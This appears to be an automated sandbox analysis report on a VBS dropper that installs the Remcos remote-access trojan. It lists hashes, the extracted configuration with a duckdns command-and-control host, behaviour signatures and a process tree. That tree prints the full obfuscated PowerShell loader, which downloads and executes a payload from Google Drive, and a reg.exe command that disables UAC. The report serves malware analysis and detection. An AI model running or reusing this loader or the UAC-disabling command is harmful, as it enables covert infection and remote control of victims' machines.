Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
19-11-2024 02:18
Static task
static1
Behavioral task
behavioral1
Sample
1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs
Resource
win7-20240903-en
General
-
Target
1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs
-
Size
15KB
-
MD5
57a98d83eebfd7536413c107b5561bcd
-
SHA1
ab660a6cdb0bd632e307fb5b69f895df31ef4c67
-
SHA256
1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae
-
SHA512
9c985a943bcd416e290374c29619dfd7011450f8d469b3d899de2235a2dd79d2b1eb5d845ea199ecd95f5349f2fec137aab02bc46697f778a8ee95376ce80608
-
SSDEEP
384:YwAAp2YC86mHC6GpbW+lqPIjijLUgZSPDctjjPhnwLCeFFBDq43UVcm9:YopU6OqPy6LUgaGvlwLZFFBD/3UqY
Malware Config
Extracted
remcos
RemoteHost
tr2vobvq.duckdns.org:3613
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-4S2GUG
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Blocklisted process makes network request 64 IoCs
flow pid Process 4 1400 WScript.exe 8 2464 powershell.exe 16 2464 powershell.exe 24 3088 msiexec.exe 26 3088 msiexec.exe 28 3088 msiexec.exe 30 3088 msiexec.exe 32 3088 msiexec.exe 34 3088 msiexec.exe 36 3088 msiexec.exe 43 3088 msiexec.exe 47 3088 msiexec.exe 51 3088 msiexec.exe 53 3088 msiexec.exe 54 3088 msiexec.exe 55 3088 msiexec.exe 56 3088 msiexec.exe 57 3088 msiexec.exe 58 3088 msiexec.exe 59 3088 msiexec.exe 60 3088 msiexec.exe 61 3088 msiexec.exe 62 3088 msiexec.exe 63 3088 msiexec.exe 64 3088 msiexec.exe 65 3088 msiexec.exe 66 3088 msiexec.exe 67 3088 msiexec.exe 68 3088 msiexec.exe 69 3088 msiexec.exe 72 3088 msiexec.exe 73 3088 msiexec.exe 74 3088 msiexec.exe 75 3088 msiexec.exe 76 3088 msiexec.exe 77 3088 msiexec.exe 78 3088 msiexec.exe 79 3088 msiexec.exe 80 3088 msiexec.exe 81 3088 msiexec.exe 82 3088 msiexec.exe 83 3088 msiexec.exe 84 3088 msiexec.exe 85 3088 msiexec.exe 86 3088 msiexec.exe 90 3088 msiexec.exe 92 3088 msiexec.exe 94 3088 msiexec.exe 95 3088 msiexec.exe 98 3088 msiexec.exe 100 3088 msiexec.exe 101 3088 msiexec.exe 102 3088 msiexec.exe 103 3088 msiexec.exe 104 3088 msiexec.exe 105 3088 msiexec.exe 106 3088 msiexec.exe 107 3088 msiexec.exe 108 3088 msiexec.exe 109 3088 msiexec.exe 110 3088 msiexec.exe 111 3088 msiexec.exe 112 3088 msiexec.exe 113 3088 msiexec.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 7 drive.google.com 8 drive.google.com 24 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3088 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2384 powershell.exe 3088 msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3040 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2464 powershell.exe 2464 powershell.exe 2384 powershell.exe 2384 powershell.exe 2384 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2384 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 2384 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3088 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1400 wrote to memory of 2464 1400 WScript.exe 85 PID 1400 wrote to memory of 2464 1400 WScript.exe 85 PID 2384 wrote to memory of 3088 2384 powershell.exe 98 PID 2384 wrote to memory of 3088 2384 powershell.exe 98 PID 2384 wrote to memory of 3088 2384 powershell.exe 98 PID 2384 wrote to memory of 3088 2384 powershell.exe 98 PID 3088 wrote to memory of 4256 3088 msiexec.exe 99 PID 3088 wrote to memory of 4256 3088 msiexec.exe 99 PID 3088 wrote to memory of 4256 3088 msiexec.exe 99 PID 4256 wrote to memory of 3040 4256 cmd.exe 101 PID 4256 wrote to memory of 3040 4256 cmd.exe 101 PID 4256 wrote to memory of 3040 4256 cmd.exe 101
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1b32b2a0b09264362731fefb3212dd89d0c5a588e202fe8cb0cc07b0612b06ae.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Geochemically Ejerlst Attributnavns Fortrende Feminality Hereticas #><#Afluringernes Pestbyld Panpipes #>$Thongy='Forraadnelsernes';function Counterreforms($Kubikindholds){If ($host.DebuggerEnabled) {$Elefantordnerne=4} for ($Pseudosymmetrical123=$Elefantordnerne;;$Pseudosymmetrical123+=5){if(!$Kubikindholds[$Pseudosymmetrical123]) { break }$Skydeskive+=$Kubikindholds[$Pseudosymmetrical123]}$Skydeskive}function Natbordets($Dokhavns){ .($Gallinule) ($Dokhavns)}$Akademiserings=Counterreforms 'VincnLoynEA peTPeri.SlaawVensehomob KntC Ulfl.yclIVitrECultNReplt';$Officialese=Counterreforms 'R toMBut oCl nzFulliadd,lBiffl We aPe,p/';$Buttes=Counterreforms 'bestT betlA grs fug1 nke2';$Logaritmen='Pogr[Ma dnKomtespriTMeth.S enSLusceVicurIn,ovFinniFil,CIbr e,ejiPForhO raiPiroNGranT PorMSikkALsean OptA BosGP rieCephRYuru]Dobb:Icon:Re tSVexae UdecMarkUFeltR Un iVatttUpbuY duppTintRSpo OAfskt edsoHo.pcThr,oportL,arz=Stri$ remBCentulagetUdarT SkeeMakrS';$Officialese+=Counterreforms 'Coun5Fis..Alky0Flex Omfo( DisWLeuciIncanMermdOveroBredwPrefsMont AlchNYderTUnp Fjer1Carr0 P i.Cine0phot; san CentWUvgeiShepnSvin6Beza4o ea;Sade Me.txBuks6Kru 4Hind;Holo dlr FodvE ke: Swa1Tran3 hyl1 rak.Affa0Indb)D.co IdriGHarce Pr cConvk L,goKr k/ Ind2Nv e0F mi1Sc l0Unwi0 ho1 War0Birt1Hand BydeFSynciSys,r udeeUp.lf LeaoSt.mxYear/G.ns1Real3unbu1Depo.Merc0';$Outlearning=Counterreforms 'MidtU oarsAccleh verTrag- EndA W.aGEleceSpadNRebet';$Foreskriver=Counterreforms 'FilihKom tAngrt Qu p UnasChom:Telo/Lim /AfsvdSolbrbeliiSma v T ye Per. ieg Eduo Ga.ojerngOve lSupeeGraf. StjcCo,noSnkemUltr/EneruKa ec Str? MuleFastxFr lp Retostifr lkytMil,=krybdSgetoKanawStrinIndsl jefoSinga svadAuto&TrvaiI otd R d=S ag1NatraNedfAmuseZVoteB rafNOust5Snob- BukV Regw Se,xRatoq ,toxUgudsEmanSNynauFaneP SupBMathMEnchX Bar2Uns,8TricVFod.RBe.muUnusbOve UT ebnZeeiH UdvxHemo8Desao KluJ';$Kodelaasene231=Counterreforms 'Nonc>';$Gallinule=Counterreforms 'PhasIT,roeManeX';$Ransackers='Standardprogrammers';$Artolater='\Ostentation.Non';Natbordets (Counterreforms 'Pig $SkriG VenladopO Sh BDereALa.elFluo: HypPResuO Le,s etetpeireKejsx Sadi Jens GottAmerESaloNDeteTW bf=Euch$CoxoEciern fl v sam:HenvaMnempByg PChokDA riAgaudt AspAKany+fo a$ Beta.ubrrFedntR,gaoI.dsl C aASport SupEKurtr');Natbordets (Counterreforms ' I r$OptlG uneLT,peOO erbO.hyATo vlCh r:Acrik edkRBrani CrugAm.tsA meKPropa GromOverMOblae arbR Para HlotT.ni=,nvi$ C mF psOhygerReb.eforhsDystK ampr AfsIOuttV.ygre,verRBes.. katS injPColllGnawISa.mTtrae(N,en$M trkAfstoMispdSickEChemlBageA Beea,alks .fsE.hotnGrsre ste2Enek3 Rev1Fera)');Natbordets (Counterreforms $Logaritmen);$Foreskriver=$Krigskammerat[0];$Storico123=(Counterreforms 'Gesc$DentgDobbl R mo Spab Hena BefLFi,k:PindE tamPSofahKiesO PacdChorsquoa=G,apn fluEBaciw Kni-Fr bO fskbGobbjbetjEOxy c MesTsai PrepS GeryUngrsPoettAdene OvemDyna.Forb$Curtasuc KOptaA EksdKryde ,amMMikri DaiSHndtEErhvRRundIBrusNCoungMoloS');Natbordets ($Storico123);Natbordets (Counterreforms 'Till$BamaEOpsppAghohTtheoprocdJa rsPeda. ArgH LabePutraRevedMetreFontr BetsU or[Fist$ ,gnO MaruTramtElmal Neke AutaPe srDaarn Syni cann D mgD.bg]Cyc,=Shiv$.aceO Spif.odtfSciliOutscHeliiOpiuaUddilHalveModvsBi.ne');$Pulmotrachearia=Counterreforms 'Trow$CycaEartipR,nshLigno WoodUnf,sConq. anlDT pso Spiw Deln NedlStovoJyllaJackd TrkFForjiEnd lAfs eB,nt(Fear$Sla,FD nkoFor rdi fePilisSkonkJodtrAnvei.elpvGodkeNonsrConv,pret$S,ciBInsilOrniaC,afk SugkMokkeNondd Adee omosFall)';$Blakkedes=$Postexistent;Natbordets (Counterreforms 'Bila$HitcgConjLMinuo isB AkkAKombLskat:S,atpS.igrBortUAldeN enEFlatRb,urs Svo=Opht(mas tOvereOeveSRelitFred-WrigP,nhaaKonstJingh Pro Rum$Camub BunlZe,mAEmbekTel.K satE smadDanseDrabsmyth)');while (!$Pruners) {Natbordets (Counterreforms 'T nd$Necrg analSperoNotabNikkaFo,slm rk:AggrRUneqeSu ecHeteoUme uStenpBri s vi = kum$rengvi daoShipmTrebipseutS lgo') ;Natbordets $Pulmotrachearia;Natbordets (Counterreforms 'Ideos wr,t NarA WesRBio.TUdga- DepSCha,L Bu,eEremeBeziPSy f ,ilf4');Natbordets (Counterreforms ' Ove$K ltGre.tLAntaO,appbundeAMilil Liv: AmapSkrar H.rUKre nSkidEoverrJoshs V d=O.rr(KoortStanESorts oveTSkat-ProcPEcteAPoneTVarmHFjol Par$civibTjenLMisraChauKForskSkvaEIncuDV cteMar,SExu )') ;Natbordets (Counterreforms 'Fisk$Ti kGSkruL aboOG,ribCochAF jtLPh l:BasuiTeenn.yudDUforbConfYTaktg BadGFoxeEStauRGlateFrgnnGr es For=Hers$ vivg AfllMycoO devbA,tiALuftLThyr:quinA.einPgodbpRetieFondLStafSTaloiRe.uNEnhuB T,mlTentOSkatmCrissVoveTGhauECapirLacu+ ru+Hunn%Tang$PreckP.larSkudI Dr,gEnteS Spok Br.Ano rmAn oML nse T lrUndeAEnchtPleo.Selec BaroSympuMarcnSmaat') ;$Foreskriver=$Krigskammerat[$Indbyggerens]}$Brilleslangers=325720;$Sensitometrically=31471;Natbordets (Counterreforms 'Kl d$H,angInteLT,llO o,yb emoAUr ilGloc:PersQImpruPhreEkaprrVandiI leLBil LAalbae sp Aand= ryk ExingVildeIjolTFauv-BlaccNa oOSupenSyttt ShaETan NKanoTdr,p Tyvs$I flBraveL IndA RetkBolik Bl ededid IndeDabcS');Natbordets (Counterreforms 'Data$FamigInstlEuchoRettb iladepulHack: Ti,PFormhPityyRotolL gelVesio UnssD,imt P soSnacm C niMon,nAr baVisceGl.n2Udta6Krig Phth=fea, Fr [SammSUtnkyUdbrs StatHegneKn lmFidu. olfCF okoInfrnGenevQu neVentrRepat ta]Orme: ulm:DishFE nerInc,o PremdishB,raga klis useSpec6Breb4Wam S,rokt orsrJestiPrean,ekygsans(Arve$JoguQ enuIn.leRadirCroqiC,rdl urilDro aM xe)');Natbordets (Counterreforms 'Fald$O eyg Un LKystO pirB Pura.ommL,and: MulUMolenLe sfCasta,ensv CroOUltrU C nr sh IUnd,nKoorg lie Medh=n ph Opda[Pre,s etrYEo.uSnsvitHy.eE idemblik.n opT ,smeBondXPercTJon..Dob.eR,laNvinkCBib O,egedLoesi Me NHumogFall]M ga:Inde: ugAEle,sDmmeC Pe.i BigiUnc,. .erGBlinESesqtUnmeS Ex tTetrR G.iI rotNU bogBran(samm$FornpPsycHTeokyLynbl visLsstnOA.tis,etht nnOZippm Deti ,ugnHandA Came Bro2Stet6omby)');Natbordets (Counterreforms 'Malp$DeklG onoL Op oTor.b ,liaCa,tlA ad:Sno FMicrLFdreuFireGP titNonaSPro,KGallYSpaldCaudn FinIBrann LetgChroSRevebOni AEp,cnha,de A tR Hy NPer.eLys,= Ant$L ukuTretnUlstF BroaStorvPaciOS edu ilorDr.fi Fa nClasgHyge.GaluSUhanUAdvebuv.dSCatit rotR RedIPirrNSa,rG Und( Udk$ F uBFlygrWastiRet LVitilVittELouksL.niLTotoACostNNa rg xtreSpjtrPapis Dem,Kont$VaassFluieDimiNSandS subIDiffT teOT ksmTautev ejT HadrKod.IMau,CjemaAElevLCo wL GeyyCinq)');Natbordets $Flugtskydningsbanerne;"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3088 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4256 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:3040
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5e1ab74e4b29a4aaa0f8ee291c4e7c120
SHA1d77e65a9da093beaaca9fe204382fff596dabb4d
SHA256daac84f3a03b0079a82cb7be41604679a561314d324c67af9abce1c1a6c3f150
SHA512c600837b7e051ff641386d95d7a2868f9c41bc02f4a39b73bb0d1c19d30508bde1fcf63c0e820e857ba793fbe12f533d8b8a2c77408f39e5fe6e25a7f2351127
-
Filesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
465KB
MD58f20bf5a5145791bc3413da846332a56
SHA128ba5b6d8670617f50012ffd45b4b35be4c13a45
SHA256cd77c71ef96fd9c1c2e6950d0b37046b14abda071da7d58ca1e451d933f82fc1
SHA512785cb10ed582dd246ea95d6a0890276e24791470a6d0acb607f08e9e8f8279460d2647404b3aa65d8acf8ddb8bb7135f7145c9b35afb6196e761fdfc3e777eea